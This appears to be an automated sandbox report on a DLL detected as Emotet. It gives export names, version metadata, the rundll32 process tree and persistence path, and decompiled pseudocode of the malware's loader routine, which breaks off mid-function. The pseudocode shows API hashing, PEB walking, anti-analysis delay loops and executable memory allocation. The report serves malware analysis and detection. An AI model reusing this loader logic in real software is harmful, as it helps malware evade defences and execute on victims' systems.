vwubdvrb	27	0x100012d0
wwjwzhmvamgokpco	28	0x10001400
xkxzfhlcypx	29	0x100013e0
ymbvkolu	30	0x100013f0
ysalxcm	31	0x10001370
yunkbwpwoaao	32	0x10001240
zcnrxdgkldemutk	33	0x10001230

Version Infos

Description	Data
InternalName	Onqeyxlcnp.dll
FileVersion	7.2.3.7
ProductName	Onqeyxlcnp
ProductVersion	7.2.3.7
FileDescription	asdzxcqwe123
OriginalFilename	Onqeyxlcnp.dll
Translation	0x0408 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6984 Parent PID: 5432

General

Start time:	05:11:59
Start date:	25/11/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll"
Imagebase:	0xdb0000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.1000235837.000000000099C000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6996 Parent PID: 6984

General

Start time:	05:12:00
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7004 Parent PID: 6984

General

Start time:	05:12:00
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\tUJXpPwU27.dll,Control_RunDLL
Imagebase:	0xb70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.997848622.0000000002E95000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7016 Parent PID: 6996

General

Start time:	05:12:00
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",#1
Imagebase:	0xb70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.977580541.0000000002CEA000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7068 Parent PID: 6984

General

Start time:	05:12:04
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\tUJXpPwU27.dll,aocchppr
Imagebase:	0xb70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.997168710.00000000006AA000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7088 Parent PID: 6984

General

Start time:	05:12:09
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\tUJXpPwU27.dll,atibsyaucowikobny
Imagebase:	0xb70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.998474628.000000000089A000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6044 Parent PID: 7016

General

Start time:	05:14:32
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",Control_RunDLL
Imagebase:	0xb70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6696 Parent PID: 7004

General

Start time:	05:14:34
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cilqlpbnkp\gwjznuxweg.czu",ligDrVSARhbsLaD
Imagebase:	0xb70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1134773374.0000000000A6A000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4972 Parent PID: 7068

General

Start time:	05:14:39
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",Control_RunDLL
Imagebase:	0xb70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4664 Parent PID: 7088

General

Start time:	05:14:42
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",Control_RunDLL
Imagebase:	0xb70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7128 Parent PID: 6984

General

Start time:	05:14:43
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",Control_RunDLL
Imagebase:	0xb70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6336 Parent PID: 568

General

Start time:	05:15:05
Start date:	25/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6424 Parent PID: 568

General

Start time:	05:15:37
Start date:	25/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 5904 Parent PID: 6696

General

Start time:	05:15:46
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cilqlpbnkp\gwjznuxweg.czu",Control_RunDLL
Imagebase:	0xb70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 5252 Parent PID: 568

General

Start time:	05:15:56
Start date:	25/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6984 Parent PID: 5432 loaddll32.exeCOMMON

Executed Functions

Function 6E7D6430, Relevance: 120.9, APIs: 65, Strings: 3, Instructions: 1860
threadwindowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 44%

			E6E7D6430(void* __ebx, signed char __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed char _v28;
				signed int _v29;
				signed char _v36;
				signed int _v40;
				signed char _v41;
				signed int _v48;
				signed char _v52;
				signed int _v56;
				signed short* _v60;
				signed char _v64;
				signed int _v72;
				signed int _v76;
				void* _v80;
				signed int _v84;
				signed char _v85;
				void* _v92;
				signed int _v96;
				signed int _v100;
				signed int* _v108;
				signed char _v112;
				signed int _v116;
				void* _v120;
				signed char _v140;
				signed int _v144;
				signed int _v148;
				void* _v160;
				void* _v164;
				void* _v192;
				intOrPtr _v244;
				char _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v272;
				char _v276;
				void* _v280;
				void* __ebp;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed char _t495;
				signed int _t496;
				void* _t500;
				signed int _t501;
				signed int _t512;
				void* _t513;
				void* _t517;
				void* _t523;
				void* _t524;
				signed int _t530;
				signed int _t531;
				signed int _t535;
				long _t536;
				void* _t539;
				signed int _t545;
				signed char _t547;
				signed int _t551;
				signed int _t555;
				signed int _t562;
				void* _t563;
				signed int _t567;
				signed int _t569;
				signed int _t571;
				signed int _t572;
				WCHAR* _t573;
				void* _t574;
				unsigned short _t576;
				unsigned short _t577;
				signed int _t581;
				struct HWND__* _t582;
				signed char _t588;
				signed char _t591;
				signed int _t595;
				signed int _t601;
				signed int _t602;
				signed int _t609;
				signed int _t613;
				struct HWND__* _t618;
				signed int _t620;
				struct HWINSTA__* _t623;
				void* _t627;
				void* _t628;
				void* _t631;
				signed int _t633;
				signed int _t636;
				char _t637;
				void _t642;
				signed int _t644;
				signed int _t645;
				void* _t646;
				signed char _t647;
				signed char _t651;
				signed char _t652;
				signed int _t653;
				signed char _t656;
				signed char _t659;
				signed char _t662;
				signed char _t663;
				signed char _t664;
				signed char _t667;
				signed char _t668;
				long _t672;
				void* _t674;
				long _t675;
				void* _t676;
				void* _t678;
				void* _t679;
				signed int _t680;
				void* _t685;
				signed int _t686;
				signed char _t690;
				signed int _t694;
				signed int _t696;
				signed int _t699;
				signed char _t703;
				signed int _t704;
				signed char _t710;
				signed int _t716;
				signed char _t724;
				signed char _t727;
				struct HWND__* _t729;
				signed int _t731;
				signed int _t732;
				signed int _t735;
				signed int _t743;
				signed int _t745;
				signed char _t746;
				struct HWND__* _t753;
				signed char _t763;
				signed char _t767;
				signed int _t778;
				void* _t782;
				signed int _t783;
				signed char _t786;
				intOrPtr* _t791;
				void* _t792;
				signed int _t794;
				signed char _t796;
				signed int _t797;
				signed int _t803;
				signed int _t805;
				signed char _t810;
				signed char _t821;
				signed char _t823;
				signed char _t824;
				signed int _t828;
				signed int _t829;
				signed int _t836;
				signed int _t841;
				signed int _t847;
				signed char _t848;
				char* _t851;
				signed int _t854;
				signed char _t857;
				signed int _t864;
				long _t875;
				void* _t876;
				signed char _t879;
				intOrPtr* _t884;
				void* _t888;
				signed int _t902;
				signed int _t908;
				signed char _t909;
				signed char _t910;
				signed int _t913;
				signed int _t914;
				signed int _t929;
				signed char _t933;
				intOrPtr _t944;
				signed int _t945;
				intOrPtr* _t946;
				intOrPtr* _t947;
				signed int _t949;
				void* _t951;
				intOrPtr* _t952;
				void* _t953;
				unsigned int _t954;
				void* _t955;
				intOrPtr _t957;
				signed int _t958;
				signed int _t960;
				signed int _t961;
				signed char _t962;
				signed int _t963;
				signed int _t968;
				signed int _t970;
				signed int _t971;
				void* _t972;
				intOrPtr* _t973;
				signed char _t974;
				void* _t975;
				signed char _t976;
				signed int _t977;
				intOrPtr* _t984;
				signed int _t987;
				signed char _t988;
				void* _t989;
				signed int _t990;
				signed int _t993;
				signed int _t994;
				void* _t996;
				signed int _t997;
				signed int _t998;
				signed int _t999;
				intOrPtr* _t1002;
				signed int* _t1008;
				signed char _t1011;
				signed int _t1013;
				signed int _t1015;
				void* _t1016;
				signed int _t1017;
				void* _t1020;
				signed int _t1023;
				void* _t1024;
				signed char _t1025;
				void* _t1026;
				signed char _t1027;
				signed int _t1029;
				signed char _t1030;
				signed int _t1031;
				void* _t1032;
				intOrPtr _t1033;
				void* _t1042;

				_t786 = __ecx;
				_push(0xffffffff);
				_push(E6E808AA0);
				_push( *[fs:0x0]);
				_t1033 = _t1032 - 0x108;
				_t487 =  *0x6e81e008; // 0x972ae1c9
				_t488 = _t487 ^ _t1031;
				_v24 = _t488;
				_push(__esi);
				_push(_t488);
				_t489 =  &_v16;
				 *[fs:0x0] = _t489;
				_v20 = _t1033;
				asm("movups xmm0, [ebp+0x8]");
				asm("movups [ebp-0x114], xmm0");
				asm("movups xmm0, [ebp+0x18]");
				asm("movups [ebp-0x104], xmm0");
				asm("movups xmm0, [ebp+0x28]");
				asm("movups [ebp-0xf4], xmm0");
				asm("rdtscp");
				_v28 = __ecx;
				if(__edx != 0 || _t489 > 0x989680) {
					_v36 = 0x9705dbf;
				} else {
					asm("rdtscp");
					_v28 = __ecx;
					_t489 = E6E807870(0x989680, 0, _t489, __edx);
					_v36 = _t489;
				}
				asm("rdtscp");
				_v28 = _t786;
				_t908 = _t489 * 0x40de >> 0x20;
				_t495 = E6E808130(_t489 * 0x40de, 0 + _t908, 0x5f, 0) + 3;
				_v112 = _t495;
				_v52 = _t495;
				_v140 = _t495;
				_t496 = _v36;
				_v40 = _t496;
				_v29 = _t496;
				_t984 = __imp__GetTickCount64;
				asm("xorps xmm0, xmm0");
				asm("movsd [ebp-0x7c], xmm0");
				asm("movsd [ebp-0xe0], xmm0");
				asm("movsd xmm0, [0x6e818650]");
				asm("movsd [ebp-0xb0], xmm0");
				asm("movsd [ebp-0x98], xmm0");
				asm("movsd xmm0, [0x6e818570]");
				asm("movsd [ebp-0xa8], xmm0");
				asm("movsd [ebp-0xc8], xmm0");
				asm("movsd xmm0, [0x6e818670]");
				_v144 = 0;
				_v148 = 0;
				_v48 = 0;
				asm("movsd [ebp-0xb8], xmm0");
				asm("movsd [ebp-0xd0], xmm0");
				 *_t984();
				 *_t984();
				_t500 = _v280;
				_v92 = _t500;
				_v164 = _t500;
				while(1) {
					_t501 =  *_t984();
					__imp__GetTickCount64();
					_v96 = _t501;
					_v28 = _t908;
					E6E8084C0(E6E807870(_t501, _t908, 0x2710, 0), _t502, _t908);
					asm("mulsd xmm0, [0x6e818550]");
					asm("movsd [ebp-0x64], xmm0");
					E6E8084C0(E6E807870(_v96, _v28, 0x2710, 0), _t504, _t908);
					asm("mulsd xmm0, [0x6e818650]");
					_t791 = _v92;
					asm("movsd xmm1, [ebp-0x64]");
					asm("addsd xmm1, xmm0");
					asm("mulsd xmm1, [0x6e818570]");
					asm("divsd xmm1, [0x6e818590]");
					asm("movsd [ebp-0x64], xmm1");
					asm("movsd [ebp-0xd8], xmm1");
					if( *_t791 != 0x5a4d) {
						goto L279;
					}
					_t908 =  *(_t791 + 0x3c);
					if(_t908 - 0x40 > 0x3bf) {
						goto L279;
					}
					_t908 = _t908 + _t791;
					_v116 = _t908;
					if( *_t908 == 0x4550) {
						_t944 =  *[fs:0x30];
						while(1) {
							_t793 = _v36;
							_t909 = _v52;
							_t508 = _t793 + _t793;
							if(_t793 + _t793 >= _t909) {
								_t513 =  *((intOrPtr*)(_t944 + 0xc));
								_v80 = _t513;
								_v160 = _t513;
								_t945 =  *((intOrPtr*)(_t513 + 0x14));
								_t514 = _v120;
								_v72 = _v120;
								goto L11;
							}
							asm("movsd xmm0, [0x6e8185d0]");
							asm("movsd [ebp-0x84], xmm0");
							do {
								__imp__IsWow64Message();
								asm("movsd xmm0, [ebp-0x84]");
								E6E7D5780(E6E8083AF(_t508), _t509, _t909);
								_t1033 = _t1033 + 8;
								asm("movd xmm0, esi");
								asm("cvtdq2pd xmm0, xmm0");
								asm("addsd xmm0, [ebp-0x84]");
								asm("cvttsd2si ecx, xmm0");
								asm("movsd [ebp-0xc0], xmm0");
								_t793 = E6E7D5ED0(_t793, _t909);
								_t508 = E6E808500(_t511, _t511);
								asm("movaps xmm1, xmm0");
								asm("movsd [ebp-0x84], xmm0");
								asm("mulsd xmm1, [ebp-0xc0]");
								asm("movd xmm0, esi");
								asm("cvtdq2pd xmm0, xmm0");
								asm("subsd xmm0, xmm1");
								asm("cvttsd2si eax, xmm0");
								__eflags = _t508 - 0x7f;
							} while (_t508 != 0x7f);
							_t512 = 0x11;
							do {
								_t512 = _t512 + _t512;
								_t794 = _t512;
								_v40 = _t794;
								_v29 = _t794;
								__eflags = _t794 - 0x56;
							} while (__eflags < 0);
						}
						while(1) {
							L11:
							_v108 = _t945;
							_v76 = _t945;
							if(_t945 == 0) {
								break;
							}
							_t1042 = _t793 - _t909;
							if(_t1042 <= 0) {
								_t864 = _v40;
								_t667 = 0;
								_t1017 = 0x6c;
								__eflags = _t864 - 0x80;
								if(_t864 != 0x80) {
									L125:
									__eflags = _t864 - 0x4f;
									if(_t864 != 0x4f) {
										L128:
										_t668 = 0x3e;
										L129:
										_v41 = _t668;
										asm("cdq");
										E6E7D5780(_t668, _t668, _t909);
										_t1033 = _t1033 + 8;
										_t668 = _v41 + _v41;
										goto L129;
									}
									_t672 = TlsAlloc();
									asm("movsd xmm0, [0x6e8185b0]");
									_t674 = E6E7D5780(E6E8083AF(_t672), _t673, _t909);
									asm("movsd xmm0, [0x6e8185c0]");
									_t1033 = _t1033 + 8;
									asm("movsd [ebp-0x7c], xmm0");
									__eflags = _t674 - 0x80;
									if(_t674 != 0x80) {
										goto L128;
									} else {
										goto L127;
									}
									do {
										L127:
										_t675 = GetDialogBaseUnits();
										asm("movsd xmm0, [ebp-0x7c]");
										asm("subsd xmm0, xmm0");
										_t676 = E6E8083AF(_t675);
										asm("movsd xmm0, [ebp-0x7c]");
										_t678 = E6E7D5990(_t909, E6E8083AF(_t676), _t909);
										_t1033 = _t1033 + 8;
										asm("movd xmm0, ecx");
										asm("cvtdq2pd xmm0, xmm0");
										asm("movsd [ebp-0x7c], xmm0");
										_t679 = E6E808500(_t678, _t676);
										asm("divsd xmm0, [ebp-0x7c]");
										asm("cvttsd2si eax, xmm0");
										__eflags = _t679 - 0x80;
									} while (_t679 == 0x80);
									goto L128;
								} else {
									goto L124;
								}
								do {
									L124:
									_t680 = E6E7D5990(_t909, _t1017, _t667);
									E6E7D57C0();
									_v48 = _t680;
									_v28 = _t909;
									E6E7D5990(_t909, _t680, _t909);
									_t1033 = _t1033 + 0x10;
									asm("cdq");
									_t864 = E6E807C80(_t680, _t909, _v48, _v28);
									E6E808500(_t683, _t864);
									_t667 = _v28;
									asm("movd xmm1, esi");
									_t1017 = _v48;
									asm("cvtdq2pd xmm1, xmm1");
									asm("mulsd xmm1, xmm0");
									asm("cvttsd2si ecx, xmm1");
									__eflags = _t864 - 0x80;
								} while (_t864 == 0x80);
								goto L125;
							}
							_t1020 =  *(_t945 + 0x24) & 0x0000ffff;
							_t685 =  *((intOrPtr*)(_t945 + 0x28));
							_v72 = _t685;
							_t968 = 0;
							_v120 = _t685;
							_t52 = _t1020 + 1; // 0x1
							_t686 = _t52;
							_v56 = 0;
							_t929 = _t686 * 4 >> 0x20;
							_push( ~(_t1042 > 0) | _t686 * 0x00000004);
							E6E7E4481( ~(_t1042 > 0) | _t686 * 0x00000004, _t929, _t1020, _t1042);
							_t1033 = _t1033 + 4;
							_t514 = _t1020;
							_v28 = _t1020;
							if(_t1020 == 0) {
								L110:
								_t793 = _v36;
								L111:
								__eflags = _v144;
								if(__eflags == 0) {
									L122:
									_t909 = _v52;
									_t945 =  *_v76;
									continue;
								}
								__eflags = _v148;
								if(__eflags == 0) {
									goto L122;
								}
								__eflags = _v48;
								if(__eflags == 0) {
									goto L122;
								}
								__eflags = _t793 - _v140;
								_t909 = 0x91afca54;
								_t690 =  !=  ? _t793 : _v112;
								_v8 = 2;
								_v36 = _t690;
								_v48 = _t690;
								E6E7D8080(0x91afca54);
								_t875 =  *((intOrPtr*)(_v116 + 0x50)) + 0xc;
								__eflags = _t875;
								_t514 = VirtualAlloc(0, _t875, 0x3000, 0x40); // executed
								_t876 = _t514;
								_v8 = 0xffffffff;
								_v80 = _t876;
								_v160 = _t876;
								break;
							}
							asm("cdq");
							_t694 = _v36 - _t929 >> 1;
							_v84 = _t694;
							do {
								if(_t694 < _v52) {
									_t1023 = 0x50;
									_t970 = 0;
									__eflags = 0;
									do {
										GetThreadLocale();
										_t696 = E6E807830(_t1023, _t970, _t1023, _t970);
										_v96 = _t696;
										_t970 = _t929;
										_t1023 = _t696;
										__eflags = _t696 - 0x7e;
									} while (_t696 != 0x7e);
									_v29 = 0x6f;
									do {
										GetEnvironmentStringsW();
										asm("cdq");
										_t699 = E6E7D5990(_t929, _v29, _t929);
										_t1033 = _t1033 + 8;
										_v29 = _t699;
										__eflags = _t699 - 0x76;
									} while (_t699 == 0x76);
									_v40 = 0x68;
									do {
										GetCommandLineA();
										asm("cdq");
										_t929 = E6E7D5780(_v40, _v40, _t929);
										_t1033 = _t1033 + 8;
										_v40 = _t929;
										_v29 = _t929;
										__eflags = _t929 - 0x70;
									} while (_t929 < 0x70);
									_t971 = _v56;
									_t1024 = _v72;
									goto L24;
								}
								_t783 = E6E7D8030(_t968, 0xd, _t1024);
								_t929 = _v40;
								_t971 = _t783;
								L24:
								_t703 =  *_t1024;
								_t704 = _t703 & 0x000000ff;
								if(_t703 >= 0x61) {
									_t971 = _t971 + 0xffffffe0;
								}
								_t968 = _t971 + _t704;
								_t694 = _v84;
								_t1024 = _t1024 + 1;
								_t879 = _v28 + 0xffff;
								_v56 = _t968;
								_v72 = _t1024;
								_v120 = _t1024;
								_v28 = _t879;
							} while (_t879 != 0);
							if(_t968 != 0x6a4abc5b) {
								goto L110;
							}
							_t1025 = _v52;
							while(_v36 + 4 <= _t1025) {
								if(_t929 <= 0x56) {
									__eflags = _t929 - 3;
									if(_t929 < 3) {
										_t782 = E6E7D5990(_t929, 0x11, 0);
										_t1033 = _t1033 + 8;
										_t84 = _t782 + 0x72; // 0x72
										_t929 = _t84;
									}
								} else {
									__imp__IsWow64Message();
									_t929 = 0x44;
								}
								asm("movsd xmm0, [0x6e818600]");
								asm("movsd [ebp-0x40], xmm0");
								if(_t929 != 6) {
									L36:
									if(_t929 < 2) {
										InSendMessage();
										E6E7D5990(_t929, 0, 0);
										_t1033 = _t1033 + 8;
									}
									_t777 = 0x1f;
									do {
										asm("cdq");
										_t778 = E6E7D5990(_t929, _t777, _t929);
										_t777 = _t778;
										_t1033 = _t1033 + 8;
										_t929 = _t778;
										_v40 = _t929;
										_v29 = _t929;
									} while (_t929 < 2);
									continue;
								} else {
									do {
										GetSystemDefaultLangID();
										asm("cvttsd2si ecx, [ebp-0x40]");
										E6E7D57C0();
										asm("movsd xmm1, [ebp-0x40]");
										asm("movd xmm0, eax");
										asm("cvtdq2pd xmm0, xmm0");
										asm("divsd xmm1, xmm0");
										asm("subsd xmm0, xmm1");
										asm("movsd [ebp-0x40], xmm1");
										asm("cvttsd2si edx, xmm0");
									} while (_t929 == 6);
									goto L36;
								}
							}
							_t972 =  *(_v76 + 0x10);
							_v80 = _t972;
							_v160 = _t972;
							_t710 =  *((intOrPtr*)( *((intOrPtr*)(_t972 + 0x3c)) + _t972 + 0x78)) + _t972;
							_v64 = _t710;
							_v60 =  *((intOrPtr*)(_t710 + 0x20)) + _t972;
							_t793 = _v36;
							_v96 =  *((intOrPtr*)(_t710 + 0x24)) + _t972;
							_t514 = 3;
							_v84 = 3;
							while(1) {
								_v28 = _t793;
								__eflags = _t514;
								if(_t514 == 0) {
									goto L111;
								}
								_t973 = __imp__GetShellWindow;
								while(1) {
									__eflags = _t793 + _t793 - _t1025;
									if(_t793 + _t793 >= _t1025) {
										break;
									}
									__eflags = _t929 - 0x68;
									if(__eflags == 0) {
										 *_t973();
										_t929 = _v40;
										__eflags = _t929 - 0x68;
										_t793 = _v36;
									}
									_t929 = (_t929 & 0xffffff00 | __eflags == 0x00000000) - 0x00000001 & 0x000000f0;
									_v40 = _t929;
									_v29 = _t929;
								}
								_t974 = _v28;
								_t884 = _v80 +  *_v60;
								_t1026 = 0;
								__eflags = 0;
								_t716 =  *_t884;
								do {
									asm("ror esi, 0xd");
									_t884 = _t884 + 1;
									_t1026 = _t1026 + _t716;
									_t716 =  *_t884;
									__eflags = _t716;
								} while (_t716 != 0);
								__eflags = _t1026 - 0xec0e4e8e;
								if(_t1026 == 0xec0e4e8e) {
									L54:
									__eflags = _v36 + 4 - _v140;
									_t886 =  >  ? _t974 : _v112;
									_t975 = _v80;
									_v36 =  >  ? _t974 : _v112;
									_v8 = 0xffffffff;
									_t888 =  *((intOrPtr*)(_v64 + 0x1c)) + ( *_v96 & 0x0000ffff) * 4;
									__eflags = _t1026 - 0xec0e4e8e;
									if(_t1026 != 0xec0e4e8e) {
										__eflags = _t1026 - 0x7c0dfcaa;
										if(_t1026 != 0x7c0dfcaa) {
											__eflags = _t1026 - 0x91afca54;
											if(_t1026 != 0x91afca54) {
												L73:
												_t514 = _v84 + 0xffff;
												_v84 = _t514;
												L75:
												_t793 = _v36;
												_t1027 = _t793;
												_t929 = _v40;
												__eflags = _t793 - _v52;
												if(_t793 <= _v52) {
													L42:
													_t1025 = _v52;
													continue;
												}
												_t724 = _t793 + 4;
												_v28 = _t724;
												asm("o16 nop [eax+eax]");
												while(1) {
													_t976 = _t1027;
													__eflags = _t724 - _v52;
													if(_t724 > _v52) {
														break;
													}
													__eflags = _t929 - 4;
													if(_t929 != 4) {
														__imp__UnregisterApplicationRecoveryCallback();
														L109:
														GetEnvironmentStringsW();
														goto L109;
													}
													E6E7D57C0();
													_t929 = _t724 + (_t724 << 2) << 2;
													_v40 = _t929;
													_v29 = _t929;
													__eflags = _t929 - 0x2c;
													if(_t929 <= 0x2c) {
														goto L109;
													}
													_t514 = _v84;
													_t1027 = _t1027 + 1;
													_t793 = _v36;
													__eflags = _t976 - _v112;
													if(_t976 < _v112) {
														goto L42;
													}
													_t724 = _v28;
												}
												_v60 =  &(_v60[2]);
												_v96 = _v96 + 2;
												_t514 = _v84;
												_t793 = _v36;
												goto L42;
											}
											_t727 = _v52;
											__eflags = _v36 - _t727;
											if(_v36 < _t727) {
												__eflags = _t929 - 0x2c;
												if(_t929 < 0x2c) {
													L107:
													GetCurrentThreadId();
													goto L107;
												}
												asm("movsd xmm1, [0x6e8185e8]");
												__eflags = _t929 - 9;
												if(_t929 >= 9) {
													L66:
													asm("movss xmm0, [0x6e8186b4]");
													asm("movss [ebp-0x34], xmm0");
													asm("movsd xmm0, [0x6e8185f0]");
													asm("movsd [ebp-0x84], xmm0");
													do {
														_t729 = GetCapture();
														asm("movss xmm1, [ebp-0x34]");
														asm("movsd xmm0, [ebp-0x84]");
														asm("cvtps2pd xmm1, xmm1");
														asm("mulsd xmm1, xmm0");
														asm("cvtpd2ps xmm1, xmm1");
														asm("movss [ebp-0x34], xmm1");
														_t731 = E6E7D5990(_t929, E6E8083AF(_t729), _t929);
														asm("movss xmm0, [ebp-0x34]");
														_t1033 = _t1033 + 8;
														_t732 = _t731;
														asm("cvtps2pd xmm0, xmm0");
														asm("movd xmm1, eax");
														asm("cvtdq2pd xmm1, xmm1");
														asm("addsd xmm0, xmm1");
														asm("movsd [ebp-0x84], xmm1");
														asm("cvttsd2si eax, xmm0");
														_v40 = _t732;
														_v29 = _t732;
														__eflags = _t732 - 0x31;
													} while (_t732 == 0x31);
													asm("movss xmm2, [0x6e8186d4]");
													_t977 = 0x6c;
													asm("movss [ebp-0x34], xmm2");
													_v28 = 0;
													__eflags = _t732 - 0xd;
													if(_t732 < 0xd) {
														L71:
														__eflags = _t732 - 0x1f;
														if(_t732 != 0x1f) {
															AreFileApisANSI();
															_v40 = 0xfffffff6;
															_v29 = 0xfffffff6;
														}
														goto L73;
													}
													__eflags = 0;
